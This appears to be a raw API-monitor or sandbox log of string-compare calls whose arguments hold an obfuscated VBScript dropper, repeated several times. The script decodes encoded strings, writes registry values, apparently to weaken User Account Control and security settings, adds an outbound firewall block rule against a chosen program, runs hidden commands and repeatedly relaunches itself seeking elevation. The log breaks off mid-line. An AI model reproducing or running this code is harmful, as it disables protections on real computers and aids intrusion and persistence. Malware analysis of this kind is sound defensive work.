bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.939] wcsncmp (_String1="0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35 [0222.939] wcsncmp (_String1="\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 81 [0222.939] wcsncmp (_String1="\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.939] wcsncmp (_String1="x4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run 